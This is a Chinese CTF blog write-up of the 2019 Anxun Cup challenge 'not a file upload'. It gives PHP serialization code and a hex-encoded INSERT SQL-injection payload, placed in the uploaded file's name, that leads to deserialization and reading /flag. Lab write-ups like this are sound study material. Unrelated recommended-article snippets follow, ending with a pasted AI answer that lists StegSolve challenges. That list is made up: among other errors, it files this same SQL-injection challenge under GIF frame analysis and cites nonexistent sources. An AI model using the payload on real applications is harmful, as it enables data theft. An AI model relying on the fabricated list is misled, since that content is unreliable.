[安洵杯 2019]不是文件上传

最新推荐文章于 2025-04-02 08:25:37 发布
原创 最新推荐文章于 2025-04-02 08:25:37 发布 · 178 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buu

本文探讨了PHP中helper类的序列化及反序列化过程,展示了如何通过构造特定的序列化字符串来触发潜在的安全漏洞,并提供了具体的SQL插入示例。

在这里插入图片描述
在这里插入图片描述

buu给了源码链接,还是直接去看源码吧

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

简单看了一下,意思就是上传图片,假如helper中以序列化形式保存图片,那么在show中就可以反序列化

<?php
class helper {
    protected $ifview = True;
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}


然后因为变量属性是protected 需要在变量名前加上\x00*\x00变量名,private则是要在变量名前加上\x00类名\x00变量名
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
所以下面用\0\0\0去填充,show反序列化前会换回去


//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

SQL语句
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,fileame,ext,path,attr
//title这里是可控的,单引号闭合

//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg

在这里插入图片描述
在这里插入图片描述

全网最细安洵2019 不是文件上传刷题笔记
m0_74925562的博客
12-24 1515
可以看出filename变量最终是由时间随机生成的文件名加上白名单后缀,而title值没有进行过滤,直接拼接传入文件名的名字去掉后缀,那我们就应该这样想,是不是可以构造恶意文件名,达到特殊的目的,我们继续往下看。没有经过过滤传入了数组,然后数组被传入数据库中,然后当反序列化时利用sql语句提前闭合,来使反序列化的对象为。的触发条件是当对象被销毁时,这里肯定是需要反序列化的,用seay的全局查找功能找一下反序列化函数。将图像属性的长和高进行序列化,然后再统一存进数据库中,我们来分析一下存入数据库的函数。
[安洵 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 388
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
BUUCTF】[安洵 2019]不是文件上传1及知识点
2401_86760082的博客
01-25 890
注入方法、分析代码中的SQL语句构造、构造恶意文件名、这个代码通过反序列化数据库 中的内容,输出图片、知识点
[安洵 2019]不是文件上传1
m0_62129839的博客
02-22 296
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 759
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
BUUCTF:[安洵 2019]不是文件上传
末初 · mochu7
03-28 2746
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
[代码审计]-安洵 2019 不是文件上传
Re_ly0n的博客
10-07 1726
说在前面 代码审计题目,buu平台给了源码链接,可自行下载 代码分析 代码下载完成后开始分析,看到了序列化和反序列化函数,尝试利用。 给三个php文件都看了一遍之后发现可以通过构造序列化去读取flag文件。 构造payload <?php class helper { protected $ifview = True; protected $config = "/flag"; } $a = new helper(); $b = serialize($a); echo
[安洵 2019]Attack
weixin_34979095的博客
08-16 1000
再次以关键词:.dmp搜索,在右下方窗口发现sass.dmp,返回的是tcp833流超大,足足34MB,是系统转储文件lsass.dmp,导出对象——http 只导出lsass.dmp。下载mimikatz_trunk压缩包,解压到指定路径,把lsass.dmp也拷贝过来,一定要拷贝在对应的。下载题目,得到一个Attack.pcap文件,使用wireshark打开,过滤条件选择http, 回车。按下CTL+F快捷键,搜索条件以此选择分组字节流,字符串,关键词设为flag,回车。今天突不能上传图片了。
安洵 2019不是文件上传
XiaoHei的博客
04-02 35
代码审计+反序列化+pop链+变量分析?
BUUCTF:[安洵 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 627
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这周写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
BUUCTF_[安洵 2019]easy_web(preg_match绕过/MD5强碰撞绕过/代码审计)
2401_87524087的博客
02-02 1374
打开靶场,出现下面的静态html页面,也没有找到什么有价值的信息。查看页面源代码在url里发现了img传参还有cmd。
[安洵-不是文件上传]代码审计+文件上传+insert注入
leekos的博客,分享web安全相关知识~
07-31 425
的话,当helper对象会序列化就会读取flag的内容,并且输出,这是利用点。如图成功转为字符串,所以我们插入16进制就会转为字符串插入到数据库,这样取出来就可以成功反序列化啦。经过序列化后的值,所以我们需要构造一下,将该值替换为恶意构造的序列化串。在这个函数中会执行sql语句,将输入插入到字符串,但是这里存在。默认的值是图片的宽高数组序列化后的值,没法控制输入。在upload()函数中,会将相关信息保存在。我们需要构造一个特定值序列化后的串,然后经过。属性的值先替换一下然后反序列化,这个属性就是。
多源动态最优潮流的分布鲁棒优化方法(IEEE118节点)(Matlab代码实现)
01-01
多源动态最优潮流的分布鲁棒优化方法(IEEE118节点)(Matlab代码实现)内容概要:本文介绍了基于Matlab实现的多源动态最优潮流的分布鲁棒优化方法,适用于IEEE118节点电力系统。该方法旨在应对电力系统中源荷不确定性带来的挑战,通过构建分布鲁棒优化模型,有效处理多源输入下的动态最优潮流问题,提升系统运行的安全性和经济性。文中详细阐述了模型的数学 formulation、求解算法及仿真验证过程,并提供了完整的Matlab代码实现,便于读者复现与应用。该研究属于电力系统优化调度领域的高水平技术复现,具有较强的工程实用价值。; 适合人群:具备电力系统基础知识和Matlab编程能力的研究生、科研人员及从事电力系统优化调度的工程技术人员,尤其适合致力于智能电网、鲁棒优化、能源调度等领域研究的专业人士。; 使用场景及目标:①用于电力系统多源环境下动态最优潮流的建模与求解;②支撑含可再生能源接入的电网调度决策;③作为鲁棒优化方法在实际电力系统中应用的教学与科研案例;④为IEEE118节点系统的仿真研究提供可复现的技术支持。; 阅读建议:建议结合提供的Matlab代码逐模块分析,重点关注不确定变量的分布鲁棒建模、目标函数构造及求解器调用方式。读者应具备一定的凸优化和电力系统分析基础,推荐配合YALMIP工具包与主流求解器(如CPLEX、Gurobi)进行调试与扩展实验。
云计算电子教材【物联网与云计算】基于传感器网络与RFID技术的智慧城市应用:云计算支撑下的物联网体系架构与产业融合发展
01-01
内容概要:本文系统介绍了物联网与云计算的基本概念、发展历程、技术架构、应用场景及产业生态。文章阐述了物联网作为未来互联网的重要组成部分,通过RFID、传感器网络、M2M通信等技术实现物理世界与虚拟世界的深度融合,并展示了其在智能交通、医疗保健、能源管理、环境监测等多个领域的实际应用案例。同时,文章强调云计算作为物联网的支撑平台,能够有效应对海量数据处理、资源弹性调度和绿色节能等挑战,推动物联网规模化发展。文中还详细分析了物联网的体系结构、标准化进展(如IEEE 1888、ITU-T、ISO/IEC等)、关键技术(中间件、QoS、路由协议)以及中国运营商在M2M业务中的实践。; 适合人群:从事物联网、云计算、通信网络及相关信息技术领域的研究人员、工程师、高校师生以及政策制定者。; 使用场景及目标:①了解物联网与云计算的技术融合路径及其在各行业的落地模式;②掌握物联网体系结构、标准协议与关键技术实现;③为智慧城市、工业互联网、智能物流等应用提供技术参考与方案设计依据;④指导企业和政府在物联网战略布局中的技术选型与生态构建。; 阅读建议:本文内容详实、覆盖面广,建议结合具体应用场景深入研读,关注技术标准与产业协同发展趋势,同时结合云计算平台实践,理解其对物联网数据处理与服务能力的支撑作用。
新的一年的第一份代码~新年祝福~加油~~
01-01
看到一个弹窗代码想试试,结果开会员才允许复制(;´д`)ゞ 得,那我自己拿AI编了类似的,不过美观方面确实和那收费还有很大差距。 o(* ̄▽ ̄*)ブ
基于Java的停车场管理系统【附源码+数据库+万字论文+PPT+包部署+录制讲解视频】.zip
最新发布
01-01
标题基于Java的停车场管理系统设计与实现研究AI更换标题第1章引言介绍停车场管理系统研究背景、意义,分析国内外现状,阐述论文方法与创新点。1.1研究背景与意义分析传统停车场管理问题,说明基于Java系统开发的重要性。1.2国内外研究现状综述国内外停车场管理系统的发展现状及技术特点。1.3研究方法以及创新点介绍本文采用的研究方法以及系统开发中的创新点。第2章相关理论总结Java技术及停车场管理相关理论,为系统开发奠定基础。2.1Java编程语言特性阐述Java的面向对象、跨平台等特性及其在系统开发中的应用。2.2数据库管理理论介绍数据库设计原则、SQL语言及在系统中的数据存储与管理。2.3软件工程理论说明软件开发生命周期、设计模式在系统开发中的运用。第3章基于Java的停车场管理系统设计详细介绍系统的整体架构、功能模块及数据库设计方案。3.1系统架构设计阐述系统的层次结构、模块划分及模块间交互方式。3.2功能模块设计介绍车辆进出管理、车位管理、计费管理等核心功能模块设计。3.3数据库设计给出数据库表结构、字段设计及数据关系图。第4章系统实现与测试系统实现过程,包括开发环境、关键代码及测试方法。4.1开发环境与工具介绍系统开发所使用的Java开发环境、数据库管理系统等工具。4.2关键代码实现展示系统核心功能的部分关键代码及实现逻辑。4.3系统测试方法与结果阐述系统测试方法,包括单元测试、集成测试等,并展示测试结果。第5章研究结果与分析呈现系统运行效果,分析系统性能、稳定性及用户满意度。5.1系统运行效果展示通过截图或视频展示系统实际操作流程及界面效果。5.2系统性能分析从响应时间、吞吐量等指标分析系统性能。5.3用户满意度调查通过问卷调查等方式收集用户反馈,分析用户满意度。第6章结论与展望总结研究成果,提出系统改进方向及未来发展趋势。6.1研究结论概括基于Java的停车场管理
智能座舱基于AR-HUD与高通8295芯片的新能源汽车抬头显示技术:驾驶交互安全与沉浸式体验系统设计
01-01
内容概要:本文深入探讨了新能源汽车智能座舱领域的新技术,重点聚焦增强现实抬头显示(AR-HUD)与高通8295车规级芯片。详细分析了HUD技术从C-HUD、W-HUD到AR-HUD的三代演进过程,揭示了AR-HUD如何通过虚实融合重构驾驶交互体验,并介绍了其在光学设计、虚实融合精度、算力需求和全天候适应性方面的核心技术难点及未来突破方向。文章还梳理了AR-HUD市场现状,指出其虽处于导入期但前景广阔,预计将成为中高端车型标配,并展望了超大视场角、多模态交互、跨场景应用和产业链协同升级的四大趋势。; 适合人群:汽车电子工程师、智能座舱研发人员、自动驾驶领域技术人员以及对新能源汽车前沿技术感兴趣的从业者和研究人员。; 使用场景及目标:①理解AR-HUD的技术原理与发展路径,掌握其在智能座舱中的核心作用;②分析AR-HUD面临的工程挑战与产业化瓶颈,为技术研发和产品规划提供参考;③把握智能座舱未来发展趋势,助力企业制定技术路线与战略布局。; 阅读建议:此资源技术深度较高,建议结合行业动态与实际案例进行延伸学习,重点关注AR-HUD与高算力芯片、AI大模型、高精度地图的协同关系,理解其作为“场景化智能交互终端”的长远价值,而非仅限于当前功能实现。
buuctf中使用stegsolve的题列出来
10-14
<think>我们正在整理BUUCTF中使用StegSolve工具的题目列表。根据之前的讨论,使用StegSolve的题目通常涉及以下技术点: - 直接查看文件格式(Analyze→File Format) - 通道分离(Data Extract功能,按BGR顺序等) - 辅助分析文件结构(配合binwalk) - LSB隐写分析 - GIF帧分析 由于BUUCTF题目数量众多且持续更新,以下列表基于常见题目及公开Writeup整理,按题型分类: ### 一、直接文件格式查看 1. **题目名称**:`stego1`(或类似名称) **关键操作**: - StegSolve中`Analyze → File Format` - 在文件头部直接找到flag字符串[^2] ### 二、通道分离类题目 1. **二维码类型题目** - `二维码`:通过Data Extract按BGR顺序提取出隐藏的PNG图片,修复高度后扫描二维码[^3] - `another_qr`:类似操作,可能需要调整位平面组合 2. **颜色通道异常题目** - `ColorfulImage`:查看各通道发现某个通道含异常信息 - `red_green_blue`:通过Image Combiner对比通道差异 ### 三、LSB隐写题目 1. **基础LSB** - `lsb1`:RGB最低位平面组合(Bit Planes: Red0, Green0, Blue0) - `lsb2`:仅某个通道最低位有效(如Blue0) 2. **进阶LSB** - `pixels`:提取像素值后需转换ASCII - `white_word`:白色背景隐藏文字,需调整阈值查看 ### 四、GIF分析题目 1. **逐帧检查** - `gif_magic`:Frame Browser中发现某帧含flag - `flash_ctf`:多帧合成信息 2. **颜色表分析** - `palette`:修改调色板顺序后显示文字 ### 五、组合工具题目 1. **StegSolve+binwalk** - `hidden_file`:binwalk发现ZIP,StegSolve辅助提取 - `double_trouble`:先通道分离再结合foremost 2. **StegSolve+高度修复** - `broken_qr`:提取不完整二维码后修改PNG高度值[^4] > 注:部分题目存在多解法,StegSolve可能非唯一工具。 §§相关问题§§ 1. 如何修复StegSolve提取出的不完整PNG图片? 2. BUUCTF中哪些LSB题目需要调整位平面组合? 3. 使用StegSolve分析GIF时有哪些注意事项? 4. 通道分离时BGR顺序和RGB顺序有什么区别? 5. 最新BUUCTF题目中是否有StegSolve的新颖用法? </think>以下是BUUCTF平台中需要使用StegSolve工具的典型题目列表,按解题技术分类整理: ### 一、通道分离与位平面分析 1. **LSB隐写类** - `[MRCTF2020] 不眠之夜`:需在Data Extract中组合Red0/Green0/Blue0位平面 - `[ACTF新生赛2020] 像素猫`:RGB通道分离后提取像素值转换ASCII - `[GXYCTF2019] 白给的词`:白色背景文字隐写,需调整Brightness阈值 2. **通道异常检测** - `[BJDCTF2020] 藏藏藏`:Blue通道含Base64编码[^4] - `[HBNIS2018] 低个头`:仅Green通道含有效信息 ### 二、文件结构分析 1. **隐藏文件提取** - `[SUCTF2018] 单文件`:配合binwalk发现ZIP,用Data Extract提取[^1] - `[安洵2019] 吹着贝斯扫二维码`:Frame Browser分析分块结构 2. **文件头修复** - `[WUSTCTF2020] 颜值成绩查询`:提取二维码后需修复PNG高度[^3] - `[GUET-CTF2019] 虚假的压缩包`:StegSolve发现异常文件尾 ### 三、动态图分析 1. **GIF帧检查** - `[安洵2019] 不是文件上传`:Frame Browser发现隐藏帧 - `[RCTF2019] 抽老婆`:多帧合成flag 2. **调色板异常** - `[SWPU2019] 神奇的二维码`:颜色表修改后显示完整二维码 ### 四、复合型题目 1. **多层隐写** - `[MRCTF2020] 禁止套娃`:先通道分离→再LSB分析→最后Base64解码 - `[UTCTF2020] 听首音乐`:频谱图+StegSolve通道异或 > 注:部分题目需配合其他工具(如010 Editor修复高度、Audacity分析音频)[^3][^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值